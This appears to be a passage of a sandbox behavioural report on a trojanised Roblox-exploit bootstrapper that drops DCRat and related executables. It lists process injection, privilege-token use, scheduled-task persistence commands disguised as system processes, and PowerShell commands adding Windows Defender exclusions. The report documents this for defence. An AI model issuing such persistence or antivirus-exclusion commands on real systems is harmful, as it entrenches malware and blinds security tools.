N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\csrss.exe N/A
N/A N/A C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe N/A
N/A N/A C:\winNet\wscript.exe.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2756 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 2756 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 2756 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 2756 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 2756 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 2756 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 2756 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 2756 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
PID 2756 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
PID 2756 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
PID 2756 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
PID 2692 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2692 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2692 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2692 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2692 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2692 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2692 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 2692 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 2692 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 2692 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 2692 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 2544 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2544 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2544 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2544 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2544 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2544 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2544 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 2692 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2692 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2692 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2692 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2692 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2692 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2692 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2544 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 2544 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 2544 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 2544 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 2544 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 2544 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 2544 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 2972 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 2972 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 2972 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 2972 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 2972 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 2972 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 2972 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 2588 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2588 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2588 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2588 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2588 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2588 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2588 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Users\Admin\AppData\Local\Temp\Youtube.exe

"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"

C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe

"C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe"

C:\Users\Admin\AppData\Local\Temp\Result.exe

"C:\Users\Admin\AppData\Local\Temp\Result.exe"

C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"

C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

"C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Users\Admin\AppData\Local\Temp\Frage build.exe

"C:\Users\Admin\AppData\Local\Temp\Frage build.exe"

C:\Users\Admin\AppData\Local\Temp\solara.exe

"C:\Users\Admin\AppData\Local\Temp\solara.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\audiodg.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 8 /tr "'C:\Windows\Offline Web Pages\Refcrt.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 9 /tr "'C:\Windows\Offline Web Pages\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 9 /tr "'C:\winNet\Bloxstrap.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Bloxstrap" /sc ONLOGON /tr "'C:\winNet\Bloxstrap.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 10 /tr "'C:\winNet\Bloxstrap.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\audiodg.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Users\All Users\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsml" /sc MINUTE /mo 6 /tr "'C:\winNet\lsm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\winNet\lsm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\winNet\lsm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 9 /tr "'C:\winNet\wscript.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\winNet\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\winNet\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\DriversavessessionDlldhcp\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Windows\de-DE\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\de-DE\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Windows\de-DE\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\lsass.exe'

